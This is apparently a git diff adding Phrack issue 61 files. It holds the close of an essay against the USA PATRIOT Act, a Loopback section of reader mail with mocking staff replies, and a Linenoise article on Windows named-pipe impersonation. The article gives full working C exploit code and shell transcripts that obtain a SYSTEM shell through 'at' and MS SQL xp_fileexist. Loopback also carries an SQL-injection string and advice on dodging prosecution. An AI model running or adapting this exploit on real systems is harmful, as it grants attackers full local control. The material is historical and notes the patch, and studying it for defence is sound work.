+People for the Ethical Treatment of Animals (PETA), Food Not Bombs (FNB),
+and Anti-Racist Action (ARA) not to mention hundreds of thousands of
+outspoken protestors and activists for political and social change can be
+lumped in with the same international terrorist factions we have been
+hearing about for years.
+
+        In a report from the ACLU dated December 14, 2001, Gregory T.
+Nojeim, Associate Director of the Washington National Office stated:
+        There are very few things that enjoy almost unanimous agreement in
+        this country.  One of the most important is our collective
+        dedication to the ideals of fairness, justice and individual
+        liberty.  Much of our government is structured around the pursuit
+        of each of these ideals for every American citizen.  The
+        Administration's actions over the past three months - its
+        dedication to secrecy, the tearing down of barriers between
+        intelligence gathering and domestic law enforcement and the erosion
+        of judicial authority - are not in tune with these ideals.  (ACLU
+        20-Apr-03)
+
+        All of these provisions taken into account, it makes one wonder if
+the Bush administration's commitment to ending terrorism is part of a
+larger commitment to end political dissent in general.  After all, why
+else would a bill that so blatantly violates our basic civil liberties have
+been rushed through congress and signed into law on the horns of legitimate
+public anxiety and war fever?  Thanks to the USAPA, the war on terrorism no
+longer seems concentrated on reducing the loss of innocent life at the
+hands of those who would kill to influence our government so much as it
+focuses on anyone who would like to influence the government regardless of
+their means or intended ends.
+
+        Now is the time, when our leaders see fit to begin whittling away
+at our basic rights that we need to be and stay informed and be as vocal as
+possible.  Unfortunately, being outspoken may now land us in hot water, as
+we are now subject to the frivolous and unjust laws contained in the USAPA.
+Logic follows that if a government sees its own people as a threat, then it
+will do what it can to effectively gag them.  Why would the American people
+be seen as a threat?  All we have to do is wait out the current term and
+vote someone else into his or her place.  That is, unless the right to vote
+is next on the chopping block.
+
+        Never before has their been a time when questioning government
+action can turn someone into a terrorist and therefore an enemy of his own
+country.  Standing up for beliefs is terrorist activity?  Voicing opinions
+and writing letters to officials is terrorist activity?  The right to
+privacy and against unreasonable searches and seizures without probable
+cause is now terrorist activity?  No!  These are rights guaranteed to us by
+our country's charter!
+
+        Our leaders have seen fit to draw lines on the pavement and demand
+its allies on one side and its enemies on the other.  They are recruiting
+Americans to spy and inform on other Americans without discretion while
+needlessly inflating the importance of such buzzword-labels as
+"unpatriotic," and "un-American."  In addition, they are requiring those on
+their side to have blind faith in their leadership.  Blind faith is a good
+thing to have in certain walks of life, but political matters are most
+assuredly not one of them.  The main reason being that we are all humans
+and therefore subject to the same shortcomings and corruptibility as every
+other human being.  For our leaders to somehow suggest that they are above
+this means that they are extremely misguided in their pursuits and may no
+longer hold the public's best interests in mind.
+
+        A report issued by the Center for Constitutional Rights (CCR) one
+year after September 11, 2001 contained this apt summation:
+        The Bush Administration's war against terrorism, without boundary
+        or clear end-point, has led to serious abrogation of the rights of
+        the people and the obligations of the federal government.  Abuses,
+        of Fourth and Fifth Amendment rights in particular, have been
+        rampant, but more disturbing is the attempt to codify into law
+        practices that erode privacy, free speech, and the separation of
+        powers that is the hallmark of our democracy. (CCR 16)
+
+        Now is the time to become and stay informed and make sure that our
+leaders know that we are.  There is a complacency that has permeated our
+culture, which dictates that people can not be bothered to take an interest
+in political policy.  "Leave the politics to the politicians," is the usual
+cry.  Many people don't even try to learn about governmental policy because
+they do not think they will understand it.  Admittedly, politics is not as
+palatable as several thousand other things; root canal surgery somehow
+seems less painful.  But it is imperative that we make the effort to
+protect ourselves from an administration that sees us as unwitting sheep.
+Especially now, when checks and balances are systematically being broken
+down within the structure of our governing body, it is upon us to keep our
+leaders from becoming excessively corrupt and hold them accountable for
+trying to trample on our freedoms.
+
+        The public anxiety caused by recent events has been overwhelming.
+There is no one in this country that wishes to be a victim of terrorism,
+and the odds of it happening are miniscule at best.  Terrorism itself is a
+minor occurrence, but the fear of it has ballooned to the point of mass
+paranoia, which today, seems to be more of a mode of operation rather than
+a temporary affliction.  It is wrong for our leaders to use that fear and
+paranoia in order to limit our freedoms, regardless of the cost.
+
+        There are those who feel that they have nothing to worry about
+because they are not terrorists.  This logic is faulty because it assumes
+that our law enforcement agencies see us as innocents, which is no longer
+the case under the USAPA.  Everyone is treated as a suspect until proven
+otherwise, and even then, the connotation of being a suspected terrorist is
+enough to ruin an innocent person's life.  Under the 1983 definition of
+terrorism, far fewer people than what we are now told would fit the bill.
+By suspecting everyone, more overall undesirables will be weeded out but
+only a few of those will actually be terrorists.
+
+        Since the World Trade Center disaster, there has been mass
+speculation as far as what liberties we, as a nation, may have to give up
+as a result of national security.  And there are those who are so afraid of
+the threat that they are willing to go along with this one-sided argument.
+The other side, being both safe and free, has been largely ignored in the
+media and dodged right and left by the president's administration.  It is
+perfectly normal to fear something, even to the point of being willing to
+give up anything just to make the fear subside, but it cannot be expected
+that everyone, or even a simple majority, feel the same way.  The
+difference in opinion must be addressed and the sound basis of freedoms
+that our country was founded upon must remain intact if we are still to be
+entitled to life, liberty and happiness.
+
+        Some would say that the future of our civil rights is hazy and
+unforeseeable.  When examining the USAPA and the precedents it sets, the
+future becomes very clear.  If we allow the provisions contained in the
+USAPA to linger, we can expect an expansion of that kind of unchecked
+power.  In fact, plans are already underway.  Attorney General John
+Ashcroft is one of the parties involved in drafting what has been called
+"Patriot II."  If the bill is passed, the entropy of civil liberties in
+America will continue unhindered.  The bill will further erode governmental
+checks and balances and expand the already loose definition of terrorism to
+incorporate all outspoken dissidents, and hold media outlets responsible
+for airing or printing what would be deemed as domestic terrorism.  Under
+this power, mass media would theoretically cease any kind of editorial,
+unpopular opinion, quite possibly even normal news coverage out of fear of
+responsibility.
+
+        If our country remains on its current course, it is said that we
+will become less and less of a democracy and more of a fascist
+parliamentary dictatorship.  Eventually, our way of life will be hollowed
+out from the inside and only the most trivial of freedoms will remain.
+Deeper down, we will become a nation of benign citizens under state
+control, and the smart money says that we will still be told that America
+is the greatest democracy in the world.
+
+        This is why we must stay informed and why we must remain vigilant
+in our struggle to maintain our freedom.  The USAPA is detrimental to
+American society because at its core, it operates under the assumption that
+anyone could be a terrorist, or more generally, a threat to government
+policy.  In a true democracy, organizations like the ACLU, Bill of Rights
+Defense Committee (BORDC), and Center for Constitutional Rights (CCR) would
+not be needed because all laws would be passed with our basic civil
+liberties in mind.  Unfortunately, this is no longer (has it ever truly
+been?) the case.
+
+        The freedoms to voice our opinions and to assemble with others of a
+like-mind have been instrumental rights that we have utilized in order to
+make sure our government hears us.  Beyond that, they have played a major
+role in keeping our leaders from excessive corruption.  When our officials
+begin to make laws that counteract our freedoms, then it is time to raise
+our voices in unity despite the possibility of being called un-American.
+When our government begins to recruit Americans to inform on other
+Americans, then it is time for open defiance because living in a world
+where you can't trust your neighbor is not a world worth living in and a
+government that cannot trust its own citizens is a government that itself
+cannot be trusted.  When our leaders tell us that our voices and our
+actions are only aiding America's enemies, then it is time to stand up and
+show our leaders that we are not the servile sheep that they think we are.
+
+        As a people, we need to send a clear, resounding message to our
+elected officials that we deserve our rights, and we deserve leaders who do
+not try to undermine them.  But we also deserve safety.  Our government has
+done some nasty things overseas, mostly without public knowledge or
+consent, so is it any wonder that terrorists lash out at our leaders by
+lashing out at us?  After all, we are easy targets because we take for
+granted that out government will protect us.  The demand that we compromise
+our freedoms in order to obtain that protection is not just grossly
+insubordinate, it is indicative of a government that is quickly losing
+interest in the needs of its people.
+
+
+
+                               Works Cited
+
+American Civil Liberties Union (ACLU) 04 April 2003
+<http://www.aclu.org/NationalSecurity/NationalSecurity.cfm?ID=11437&c=111>
+
+American Civil Liberties Union (ACLU) 20 April 2003
+<http://www.aclu.org/NationalSecurity/NationalSecurity.cfm?ID=9857&c=24>
+
+Bush, George W. "Remarks on Signing the USA PATRIOT Act of 2001." Weekly
+Compilation of Presidential Documents 37 (2001): 1550-1552.
+
+Center for Constitutional Rights (CCR) 20 April 2003
+<http://www.ccr-ny.org/v2/reports/docs/Civil_Liberties.pdf>
+
+Chang, Nancy. Center For Constitutional Rights (CCR) 18 April 2003
+<http://www.ccr-ny.org/v2/reports/docs/USA_PATRIOT_ACT.pdf>
+
+Collins, Jennifer M. "And the Walls Came Tumbling Down: Sharing Grand Jury
+Information with the Intelligence Community Under the USA PATRIOT Act."
+American Criminal Law Review 39 (2002): 1261-1286.
+
+"GOP Wants to Keep Anti-Terror Powers." San Francisco Chronicle
+09 April 2003: A15
+
+Hentoff, Nat. "Resistance Rising!" Village Voice 22 November 2002.
+
+McGee, Jim. "An Intelligence Giant in the Making." Washington Post
+04 November 2001: A4.
+
+Neary, Lynn. "Commentary: Worrisome Trend of Bush Administration Efforts to
+Expand Their Collection of Information Data on American Citizens." All
+Things Considered National Public Radio. 18 November 2002.
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/2.txt b/phrack61/2.txt
new file mode 100644
index 0000000..198fb5f
--- /dev/null
+++ b/phrack61/2.txt
@@ -0,0 +1,300 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x02 of 0x0f
+
+|=----------------------=[ L O O P B A C K ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ Phrack  Staff ]=-----------------------------=|
+
+
+The good stuff.
+[1] http://segfault.net/~bbp/BSD-heap-smashing.txt
+
+The funny stuff (defaced openbsd poster).
+[1] http://stargliders.org/phrack/mmhs.jpg
+
+Russian interview:
+[1] http://www.bugtraq.ru/library/underground/phrack.html
+
+GPS Jammer hypes
+[1] http://computerworld.com/industrytopics/defense/story/0,10801,77702,00.html
+[2] http://computerworld.com/governmenttopics/government/story/0,10801,79783,00.html
+[3] http://computerworld.com/securitytopics/security/story/0,10801,77702,00.html
+[4] http://www.phrack.org/dump/phrack_gps_jammer.png
+
+www.madonna.com hacked, phrack is innocent.
+[1] http://www.thesmokinggun.com/archive/madonnasplash1.html
+[2] http://www.cnn.com/2003/TECH/internet/04/28/hackers.madonna.reut/index.html
+
+Quote of the day (as seen on irc):
+"Give me an eMail and I'll move the world."
+
+We receive a lot of stupid emails as par for the course in each round
+of phrack. However, we have some real gems for you this time. Ok, let's
+see with what lameness the audience came up with.
+
+Enjoy Loopback :>
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+From: echo_zero@mail.com
+
+yo... wassup ppl?
+lengedary group! the great masters r all here... Congratulations for all
+u have done for hacking community. i wish to be like u some day. long
+live the hackers!
+
+STAY COOL
+BE HAPPY
+
+    [ y0, da great masta speaking. Thnx bro! Enj0y #61. Keep it r3al! ]
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+From: '; OR --%20
+ 
+    [ note his elite technique ]
+
+Hi, this is me checking if i can inject SQL commands into thy webservor.
+Article's awesome.
+
+    [ did it work? ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+From: "scott johnstone" <bollocks777@hotmail.com>
+Subject: Beer Generator ANTISPAM
+
+Greets.
+
+It occurs to me that an interesting way to generate some operating capital
+for Phrack would be to sell to spammers the e-mail addresses of all the
+silly newblets that ask for basic hacking tutorials and shit like that.
+
+Granted it wouldn't be financing any phrackmobiles with rocket boosters but
+it might pay for a 6-pack for the guy who handles the loopback ;)
+
+    [ done. now hurry up and order some of that penis enlargement cream --
+      we get 20% ]
+
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: <zyx@illrepute.org>
+Subject: your PGP key
+
+What the hell is the point of posting a PGP key that has only this
+many signatures?
+
+$ gpg --list-sigs phrackstaff
+pub  1024D/3EEEDCE1 2001-05-05 phrackstaff <phrackstaff@phrack.org>
+sig         EF881DEC 2001-03-03   Binary Fus10n <binaryfus10n@hotmail.com>
+sig         D7C776BF 2001-03-03   [User id not found]
+sig         75E90D2C 2001-12-29   Calle Lidstrom <calle@swip.net>
+sig 3       3EEEDCE1 2001-05-05   phrackstaff <phrackstaff@phrack.org>
+sub  2048g/1B6B493C 2001-05-05 [expires: 2031-04-28]
+sig         3EEEDCE1 2001-05-05   phrackstaff <phrackstaff@phrack.org>
+
+    [ Conclusion: Not our key.
+      Cause: Someone tricked you.
+      Solution: Get our latest key from the latest phrack release. 
+      Remember: Stop writing us. You suck. ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+From: serased@yahoo.com
+
+y'all suck
+you guysa are illegal and you know it
+can't wait till the government bust your ass
+
+    [ we might be illegal, but we can frame you for it ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+From: Furys_Child@hotmail.com
+Subject: Phrack Loopback
+
+Hello anyone,
+
+I am sending out this message to ask for help. I want to learn the basics
+of hacking any way I can.
+
+    [ Today's lesson: "How to get subscibed to a paedophile mailing list"
+        Step 1. Ask phrackstaff to teach you how to hack
+        Step 2. Wait ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+From: changiz_a@yahoo.com
+Subject: Hide phone number
+
+I want to others can not see my phone number (home phone and cell phone)
+how can I do this ?
+
+    [ by not using the phone. ]
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: Glenn Wekony <ayce57@yahoo.com>
+Subject: Re: Message from Glenn Wekony ANTISPAM
+
+    [ ... a bunch of lame questiones about wifi hacking here ... ]
+
+[ .. ] I am delibrately using my real name and am not a police officer or
+a federal agent. I tell you this in the hope you will answer my e-mail and
+not sound suspicious. If you do not return my e-mail, I understand.
+
+Thanx, Glenn.
+
+    [ No doubt you are not a fed. The feds stopped bugging us about
+      wifi hacking techniques when they figured out how to use google. ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+From: Max Gastone <banangling@yahoo.com>
+
+> Would Phrack be interested in an article on how
+> current radical environmental & animal rights groups
+> are using the internet and email systems against
+> target companies, in particular taking on large
+> company's email systems and giving them a hammering
+> using novel protests techniques akin to DDoS (but not
+> quite that)? Would include info on several software
+> tools developed solely for this purpose.
+
+    [ "When I was a child,
+       I talked like a child,
+       I thought like a child,
+       I reasoned like a child.
+       When I became a man,
+       I put childish ways behind me."
+       (the holy bible, Paul, in his first letter to the Cor. 13:11). ]
+
+|=[ 0x0a ]=--------------------------------------------------------------=|
+
+    I need to be a haX0r says my mUm.  bcuse I jerk off too much and I need
+somthing better to do wiht the 2 hours my mom lets me have to use the
+FaMily winbook.  My Unckle billlyfish (his fucking hacksor name) told me
+that if I brake N2 nasa and steal the new rockit blueprints then give them
+to you so we/you or us/me can get together all of the 0day hackers (im not
+gay...just curious) and fly off to amsterdam where Heroin is legal that you
+will give me a hard copy set of Phrack issues 1-50.  Piss on them who dont
+like shit. lol. hahaha lamers suck.  I am only 27 but I should be sneaking
+out of my moms basement soon...like tonight to go to an internet cafe to
+masturbate because my 2 hours of Pleasureful winbook time are almost over.
+If you can muster up the fucking strengh tell me how to brake into nasa so
+i can claim me prize mate I would be as gracious as a dog with peanut
+butter Spo0ned up his asS.
+
+    [ Actually you sounded quite smart until the last 2 sentences ]
+
+PS If you make funny out of me then I promise I wont send the rocketshit
+planz to you and I will keep them for myself and take all of the hardcopys
+out of the back of that mini-gurlish SUV when i gets to holland.  Dig.  By
+the way,  after we work out a deal, you can send me my hard copy set
+through my paypal account.  (I have the biggest eshop on geocities...)
+
+    [ Fortunately, it's over, you started to become boring ]
+
+|=[ 0x0b ]=--------------------------------------------------------------=|
+
+From: unit321 <bigshot@almerger.com>
+
+if i put a disclaimer on my phrack submission, will anyone be able to
+prosecute me? in the USA?
+
+    [ Depends on which country you live in. Some countries tend to
+      change the law whenever a new president is in charge.
+      A disclaimer seldomly helps. Known technniques like leaving the
+      country or using an anonymous email account do help. ]
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+Hello,
+
+Are you being harrased by government or law enforcement?
+
+    [ Of course we are! ]
+
+|=[ 0x0c ]=--------------------------------------------------------------=|
+
+From: d.r.hedley
+Subject: question
+
+I was wanting to look at your anarchy cookbook iv,ver 4.14. but when i go
+to it. it says to  
+
+     " <-------- set your browser to this width minimal ------->".
+
+it say's that if you set your browser to the width proposed, then you'll
+have no problem viewing the cookbook.
+
+Question: how do you set your browser to the arrows that you have too - to
+be able to view the anarchist cookbook iv, ver 4.14
+
+    [ It's a secret cipher. Put your monitor upside down. There are some
+      wheels or some buttons at the bottom of you monitor. Use them to
+      adjust the horizontal width. Enlighted? ]
+
+|=[ 0x0d ]=--------------------------------------------------------------=|
+
+Hiya guys, Bread here.
+
+    [ HIYA! staff-grunt here. ]
+
+Just thought I'd try and submit an article. If I am
+successful, many more articles will be one there way. Its' an article on
+the Ping Command which I wrote about a month ago.
+
+Anyway, I hope you enjoy it and are able to actually publish it.
+Thanks for your time,
+Bread
+
+    [ Can't wait to read the other articles.  Please go ahead an email them
+      to us. All the serious articles have to be send to
+      loopback@phrack.org from now on.
+
+      To the content: Be warned, once you discover the -f flag you are
+      close to discover winnuke, bo2k, .... 
+      
+      We compressed your article to 1 line and will publish it right here:
+      $ ping -h
+      
+      Regards,
+      Phrack Staff ]
+
+|=[ 0x0e ]=--------------------------------------------------------------=|
+
+From: "Ludootje"
+
+    [ Luser saying that we should publish an article he already published
+       elsewhere, citing as a precedent "The Hackers Manifesto". ]
+
+    " [..] but I suppose "The Hackers Manifesto" wasn't first posted on
+      phrack..."
+
+
+    [ It was. 1986. http://www.phrack.org/phrack/7/P07-03.  ]
+
+|=[ 0x0f ]=--------------------------------------------------------------=|
+
+... to actually make use of the Phrack article: 
+
+"Below is the schematic diagram (gps_jammer.ps) in an uuencoded gzipped
+PostScript file. This is the native Xcircuit[12] format and is used for
+ease of viewing, printing and modification."
+
+How many FBI agents weaned on Windows will it take to get past the first
+hurdle: uuencoded?
+
+    [ So many that after 8 month we decided to help them out:
+      http://www.phrack.org/dump/phrack_gps_jammer.png
+      Or for the advanced agent:
+
+      $ uudecode p60-0x0d.txt && gunzip -d gps_jammer.ps.gz && \
+        gv gps_jammer.ps
+     ]
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/3.txt b/phrack61/3.txt
new file mode 100644
index 0000000..0275b47
--- /dev/null
+++ b/phrack61/3.txt
@@ -0,0 +1,1489 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x03 of 0x0f
+
+|=---------------------=[ L I N E N O I S E ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Phrack Staff ]=-----------------------------=|
+
+    Everything that does not fit somewhere else can be found here.
+Corrections and additions to previous articles, to short articles or
+articles that just dont make it....everything.
+
+
+Contents
+
+    1 - Windows named pipes exploitation                 by DigitalScream
+    2 - How to hack into TellMe                          by Archangel
+    3 - Shitboxing                                       by Agent5
+    4 - PalmMap v1.6 - Nmap for Palm                     by Shaun Colley
+    5 - Writing Linux/mc68xxx shellcode                  by madcr
+    6 - Finding hidden kernel modules (the extrem way)   by madsys
+    7 - Good old floppy bombs                            by Phrick
+
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 1 - Windows named pipes exploitation ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+by DigitalScream <digitalsream at real.xakep.ru> / SecurityLevel5
+
+All latest versions of  Microsoft Windows  family  operation  systems  are
+based on  Windows NT kernel. This fact has positive impact for both remote
+and local security  of  Windows  world. There  are still  some thin places
+though allowing  obtaining  Local System  privileges on the local computer
+leading  to  the  full  system  compromise.   Usually   this   is  because
+different buffer  overruns in  stack or heap  in system  services, like in
+case of  any operation system. However  we should not  forget about system
+specific bugs  because of abnormal behavior of system functions. This kind
+of  bugs is very  system dependant  and  from  time  to time is discovered
+in different OS. Of cause, Windows is not exception.
+
+Specific bugs are  usually having impact on local users. Of cause, this is
+not a kind  of axiom,  but local  user  has  access  to  larger  amount of
+the  system  API  functions comparing with  remote one. So, we are talking
+about  possibility   for   local  user  to  escalate  his  privileges.  By
+privilege escalation we  mean obtaining privileges of Local System to have
+no  limitations  at  all. Now  there  are few  ways to get it, I will talk
+about new one.
+
+According to  MSDN  to launch  application with different account one must
+use  LogonUser() and CreateProcessAsUser() functions. LogonUser() requires
+username and password for account we need. 'LogonUser()'  task  is to  set
+SE_ASSIGNPRIMARYTOKEN_NAME   and   SE_INCREASE_QUOTA_NAME  privileges  for 
+access token. This privileges are required for CreateProcessAsUser(). Only
+system processes have these privileges.  Actually  'Administrator' account
+have no enough  right  for  CreateProcessAsUser().  So,  to  execute  some
+application,  e.g.  'cmd.exe'  with  LocalSystem  account  we must have it
+already. Since  we do not have username and password of privileged user we
+need another solution.
+
+In this paper  we will obtain  'LocalSystem'  privileges  with file access
+API. To open file Windows application call CreateFile()  function, defined
+below:
+
+HANDLE CreateFile(
+        LPCTSTR               lpFileName, 
+        DWORD                 dwDesiredAccess, 
+        DWORD                 dwShareMode, 
+        LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
+        DWORD 		      dwCreationDisposition, 
+        DWORD 	              dwFlagsAndAttributes, 
+        HANDLE 	              hTemplateFile 
+        ); 
+
+To open file we must call something like
+
+HANDLE hFile;
+hFile=CreateFile(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, 
+                             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+For  advanced  Windows  programmer  it's clear that this function has more
+application  rather  than  only opening   ordinary   files.  It's  used to
+openor create  new  files, directories,  physical  drives,  and  different
+resources for  interprocess  communication,  such as pipes  and mailslots.
+We will be concerned with pipes.
+
+Pipes  are  used for one-way  data exchange  between  parent  and child or
+between  two  child  processes.  All  read/write   operations are close to
+thesame file operations.
+
+Named  Pipes are used  for two-way data exchange between client and server
+or between two client  processes.  Like pipes they are like files, but can
+be used to exchange data on the network.
+
+Named pipe creation example shown below:
+
+  HANDLE hPipe = 0;
+  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
+                           PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
+|=----------------------------------------------------------------------=|
+Named  pipe's  name can  vary,  but  it  always  has   predefined  format. 
+The example of  valid name  is  '\\.\pipe\GetSys'.   For  Windows,  '\\.\'
+sequence always precedes  filename,  e.g.  if  "C:\boot.ini"  is requested
+system  actually   accesses  '\\.\C:\boot.ini'. This  format is compatible
+with UNC standard.
+
+With basic knowledge of named pipes operations we can suppose there can be
+a way to full  application to access  named pipe  instead of user supplied
+file. For example, if we created named pipe  "\\.\pipe\GetSys" we  can try
+to force application to access "\\ComputerName\pipe\GetSys". It gives us a
+chance to manipulate with access token.
+
+Impersonation token is  access  token  with  client's privileges. That is,
+this is possibility for server to do  something on client's behalf. In our
+case server  is named pipe we created. And it becomes possible  because we
+are granted SecurityImpersonation privilege for client. More precisely, we
+can get  this privilege.  If  client  application  has privileges of local
+system we  can get access  to registry,  process and memory management and
+another possibilities not available to ordinary user.
+
+This attack can be easily realized in practice.  Attack  scenario for this
+vulnerability is next:
+
+1. Create name pipe
+
+Wait client connect after named pipe is created. 
+
+2. Impersonate client
+
+Because  we assume client  application has system rights we will have them 
+too.
+
+3. Obtain required rights. In fact, we need only 
+
+ - SE_ASSIGNPRIMARYTOKEN_NAME	
+ - SE_INCREASE_QUOTA_NAME
+
+ - TOKEN_ALL_ACCESS
+ - TOKEN_DUBLICATE
+
+This is all  we need for  CreateProcessAsUser() function. To obtain rights
+we  need  new  token  with  TOKEN_ALL_ACCESS privelege.  And we can do it,
+because we have privileges of client process.
+
+Execute code of our choice
+        
+
+It could be registry  access,  setting  some hooks or random commands with
+system privileges. Last one is  most  interesting,  because we can execute
+standalone application of our choice for our specific needs.
+
+As it was said before, now I can execute CreateProcessAsUser() with system
+ privileges. I  back  to  beginning,  but  this  time  I have all required
+privileges and 'LocalSystem' is under my thumb.
+
+There  is no problem to realize  this approach. As an example, we will use
+working  exploit   by    wirepair at sh0dan.org    based   on   the   code
+of maceo at dogmile.com.
+
+#include <stdio.h>
+#include <windows.h>
+
+int main(int argc, char **argv)
+{
+   char szPipe[64];
+   DWORD dwNumber = 0;
+   DWORD dwType = REG_DWORD;
+   DWORD dwSize = sizeof(DWORD);
+   DWORD dw = GetLastError();
+   HANDLE hToken, hToken2;
+   PGENERIC_MAPPING pGeneric;
+   SECURITY_ATTRIBUTES sa;
+   DWORD dwAccessDesired;
+   PACL pACL = NULL;
+   PSECURITY_DESCRIPTOR pSD = NULL;
+   STARTUPINFO si;
+   PROCESS_INFORMATION pi;
+
+   if (argc != 2) {
+          fprintf(stderr, "Usage: %s <progname>\n", argv[0]);
+          return 1;
+   }
+
+   memset(&si,0,sizeof(si));
+   sprintf(szPipe, "\\\\.\\pipe\\GetSys");
+
+// create named pipe"\\.\pipe\GetSys"
+
+   HANDLE hPipe = 0;
+   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
+                     PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
+   if (hPipe == INVALID_HANDLE_VALUE) {
+     printf ("Failed to create named pipe:\n  %s\n", szPipe);
+     return 2;
+   }
+
+   printf("Created Named Pipe: \\\\.\\pipe\\GetSys\n");
+
+// initialize security descriptor to obtain client application
+// privileges
+   pSD = (PSECURITY_DESCRIPTOR) 
+                        LocalAlloc(LPTR,SECURITY_DESCRIPTOR_MIN_LENGTH); 
+   InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION);
+   SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE); 
+   sa.nLength = sizeof (SECURITY_ATTRIBUTES);
+   sa.lpSecurityDescriptor = pSD;
+   sa.bInheritHandle = FALSE;
+
+   printf("Waiting for connection...\n");
+
+// wait for client connect
+   ConnectNamedPipe (hPipe, NULL);
+
+   printf("Impersonate...\n");
+
+// impersonate client
+
+   if (!ImpersonateNamedPipeClient (hPipe)) {
+     printf ("Failed to impersonate the named pipe.\n");
+     CloseHandle(hPipe);
+     return 3;
+   }
+
+   printf("Open Thread Token...\n");
+
+// obtain maximum rights with TOKEN_ALL_ACCESS
+
+   if (!OpenThreadToken(GetCurrentThread(), 
+                                TOKEN_ALL_ACCESS, TRUE, &hToken )) {
+
+             if (hToken != INVALID_HANDLE_VALUE) {
+                     printf("GetLastError: %u\n", dw);
+                     CloseHandle(hToken);
+                     return 4;
+		 }
+   }
+   
+   printf("Duplicating Token...\n");
+
+// obtain TOKEN_DUBLICATE privilege
+   if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,
+        &sa,SecurityImpersonation, 
+                TokenPrimary, &hToken2) == 0) {
+
+          printf("error in duplicate token\n");
+          printf("GetLastError: %u\n", dw);
+          return 5;
+   }
+
+// fill  pGeneric structure
+   pGeneric = new GENERIC_MAPPING;
+   pGeneric->GenericRead=FILE_GENERIC_READ;
+   pGeneric->GenericWrite=FILE_GENERIC_WRITE;
+   pGeneric->GenericExecute=FILE_GENERIC_EXECUTE;
+   pGeneric->GenericAll=FILE_ALL_ACCESS;
+
+   MapGenericMask( &dwAccessDesired, pGeneric );
+
+   dwSize  = 256;
+   char szUser[256];
+   GetUserName(szUser, &dwSize);
+
+   printf ("Impersonating: %s\n", szUser);
+   
+   ZeroMemory( &si, sizeof(STARTUPINFO));
+   si.cb = sizeof(si);
+   si.lpDesktop	        = NULL;
+   si.dwFlags	        = STARTF_USESHOWWINDOW;
+   si.wShowWindow       = SW_SHOW;
+
+   printf("Creating New Process %s\n", argv[1]);  
+
+// create new process as user
+   if(!CreateProcessAsUser(hToken2,NULL, argv[1], &sa, 
+        &sa,true, NORMAL_PRIORITY_CLASS | 
+                CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
+      printf("GetLastError: %d\n", GetLastError());
+   }
+
+// wait process to complete and exit
+   WaitForSingleObject(pi.hProcess,INFINITE);
+   CloseHandle(hPipe);
+  
+   return 0;
+}
+
+This vulnerability gives  a  chance for us to obtain  system privileges on
+local computer. The  only  condition  is system  process  must access this
+channel. This  condition  is  easy  to  reproduce  with  system  services.
+For example:
+
+[shell 1]
+
+>pipe cmd.exe
+Created Named Pipe: \\.\pipe\GetSys
+Waiting for connection...
+
+[shell 2]
+
+>time /T
+18:15
+
+>at 18:16 /interactive \\ComputerName\pipe\GetSys
+
+New task added with code 1
+
+[shell 1]
+Impersonate...
+Open Thread Token...
+Duplicating Token...
+Impersonating: SYSTEM
+Creating New Process cmd.exe
+
+Now we have new instance  of cmd.exe with system privileges. It means user
+can easily obtain  privileges  of local system.  Of cause  reproduce  this
+situation is easy only in case, there is a service, which can access files
+on  user request.  Because  'at' command  requires  at  least  power  user
+privileges  and may be used  to launch cmd.exe directly, without any named
+pipe this example is useless.
+
+In practice, this vulnerability may be exploited for privilege  escalation
+by  the local user if Microsoft SQL Server  is installed. SQL  server runs
+with system privileges and may be accessed with unprivileged user.  @Stake
+reported vulnerability in  xp_fileexist  command. This command  checks for
+file existence and we can use it to access our named pipe. Attack scenario
+is nearly same:
+
+[shell 1]
+
+>pipe cmd.exe
+Created Named Pipe: \\.\pipe\GetSys
+Waiting for connection...
+
+[shell 2]
+
+C:\>isql -U user
+Password:
+1> xp_fileexist '\\ComputerName\pipe\GetSys'
+2> go
+   File Exists File is a Directory Parent Directory Exists
+   ----------- ------------------- -----------------------
+             1                   0                       1
+
+[shell 1]
+
+Impersonate...
+Open Thread Token...
+Duplicating Token...
+Impersonating: SYSTEM
+Creating New Process cmd.exe
+
+At the   end,  it's good  to  point  that  this  vulnerability  exists  in
+Windows   NT/2000/XP   and  is   patched   with   Windows   2000  SP4  and
+on Windows 2003.
+
+A big thank to ZARAZA(www.security.nnov.ru), without him, nothing could be
+possible.
+
+
+[1] Overview of the "Impersonate a Client After Authentication"
+http://support.microsoft.com/default.aspx?scid=kb;[LN];821546
+
+[2] Exploit by maceo
+http://www.securityfocus.com/archive/1/74523
+
+[3] Exploit by wirepair
+http://www.securityfocus.com/archive/1/329197
+
+[4] Named Pipe Filename Local Privilege Escalation
+www.atstake.com/research/advisories/2003/a070803-1.txt
+
+[5] Service Pack 4 for Windows 2000 
+http://download.microsoft.com/download/b/1/a/
+b1a2a4df-cc8e-454b-ad9f-378143d77aeb/SP4express_EN.exe
+
+
